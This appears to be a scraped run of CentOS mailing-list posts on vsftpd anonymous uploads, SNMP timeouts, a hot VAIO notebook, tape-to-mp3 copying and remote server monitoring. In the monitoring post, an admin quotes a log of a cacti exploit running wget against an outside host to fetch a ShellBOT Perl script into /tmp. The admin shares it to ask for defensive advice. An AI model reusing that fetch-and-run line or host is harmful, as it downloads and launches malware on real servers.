There is sigmodules in several places in the SPEC file. The first one is set to '0' but the others are not. I prefer not setting singmodules to '0' unless I know what the risks are. The last time I recompiled a kernel was when it was at 2.4.x. vsftp anonymous upload access

I'm trying to set up anonymous ftp using vsftp. I want to be able to allow uploads. The anonymous id is userid "ftp". The ~ftp/ directory is actually owned by root, but ~ftp/pub is owned by ftp. Here's the vsftpd.conf: anonymous_enable=YES anon_upload_enable=YES local_enable=NO write_enable=NO local_umask=022 dirmessage_enable=YES xferlog_enable=YES xferlog_std_format=YES userlist_enable=YES listen=YES tcp_wrappers=YES I'm able to login to "ftp", and I'm able to "cd pub". The pub directory has permissions ownership ftp:ftp and perms of 750 or: drwxr-x--- 2 ftp ftp 4096 May 14 12:43 /var/ftp/pub Since I'm logged on as "ftp" I should be able to create the file inside the directory and write to it. BTW, I've had this problem whether write_enable=YES|NO and unless I'm misreading the docs, write_enable shouldn't affect actual uploads. What am I doing wrong? === Al

Hello All. I've got an Asus board with a non-operational nic and sound chip on Centos 4.4. Anyone know if this is possible to get working on 4.4? SNMP errors with vlans

Hi all, I keep getting the following error messages on all my systems that have Vlans configured on it's ethernet interfaces. Centos - 4.x - VAIO notebook heating up

Hi friends, I have a problem i have VAIO VGN-F seies notebook which was performing slow on main power source, working fine on battery i did some tweaks on CPU speeds reading a lot of tutorials , i do not know whether this or somthing else has now started making mine notebook got heated up , i mean it is heatin up from base. I also have windows on the same system (dual boot), it was also heating up , i then installed NHC (Notebook Hardware Control ) on windows XP, it reduced the CPU speed and which probably increases load on the system, this removed the heating problem of CPU. I have a question that is there a similar s/w availble on linux Centos 4.xor i need to reinstall the OS or can it be a hardware problem the CPU heating up. Has someone experienced the same problem , NHC says the earlier temp of my CPU was above 90 degree C now it is 60 degree C. Thanks, Early answers expected, Regards, Abhishek jain

Suggested way to remotely monitor servers and networks these days?

Hi folks, I'm just wondering what is the recommended way of monitoring servers and networks remotely. My current setup is to install and configure cacti and nagios. I've set these up to require SSL. This way, I can easily go to them and login from wherever I am and monitor (almost) everything I need to monitor. The problem is that leaving cacti open was the most stupid thing I've done. After checking /var/log/httpd/error_log, I saw that someone exploited a cacti php file and the result was: --08:13:11-- http://psaico.host.sk/desk.pl => `/tmp/desk.pl' Resolving psaico.host.sk... 62.168.109.150 Connecting to psaico.host.sk|62.168.109.150|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 20,144 (20K) [text/x-perl] 0K .......... ......... 100% 28.26KB/s 08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144] which immediately downloaded ShellBOT to /tmp and executed it. It was a good thing I caught this as early as I did. So, what's everyone elses solution these days? Or is it simply a matter of creating a /tmp partition and mounting it noexec? On a side note... anyone with experience with ShellBOT? From research, it seems to attempt to connect to an IRC server upon running. So if my outgoing connections are secured by iptables, can I assume it never got connected at all? I'll probably try this out someday but just looking for a quick experienced answer. Thanks! dex

Issues with SNMP

Hello, I'm wondering if anyone else is seeing the same issues I'm seeing here. I have recently upgraded one of my systems from 4.4 to 4.5 and ever since then I cannot get snmp to work. I am monitoring the interface traffic. Please keep in mind the firewall/router I do the same thing without any issues for 4 interfaces and it is still at 4.4 and doesn't have any issues. If I try an snmpwalk I get the following; ~~~~~~~~~~~~~~~~~~~~~~ snmp $ snmpwalk -v 1 -c <string> localhost system Timeout: No Response from localhost snmp $ snmpwalk -v 2c -c <string> localhost system Timeout: No Response from localhost ~~~~~~~~~~~~~~~~~~~~~~ snmpd is up and running according to the system ~~~~~~~~~~~~~~~~~~~~~~ snmp $ service snmpd status snmpd (pid 7884) is running... ~~~~~~~~~~~~~~~~~~~~~~ snmp.conf file hasn't changed since I last changed it in Jan. I'm stumped as to why it is not working and don't want to upgrade the router/firewall box, which is working without any issues, until this get fixed. Can someone point me to what I am missing or point me in the right direction? Thnx! Coping music from tapes

OS: CentOS 5.0 x86. Hi, I have some old music tapes and a walkman, and want to move the music to mp3 format. So far I am thinking to use Audacity to record the music to wavs, and then do not know, somehow I will compress the wavs to mp3s as vbr 192 Kbps with something. Has anyone done this? What app did you use for recording the music from the tapes and what app did you use to make it mp3? Unfortunately my mp3 player doesn't support ogg vorbis, so this is not an option. Thanks in advance.
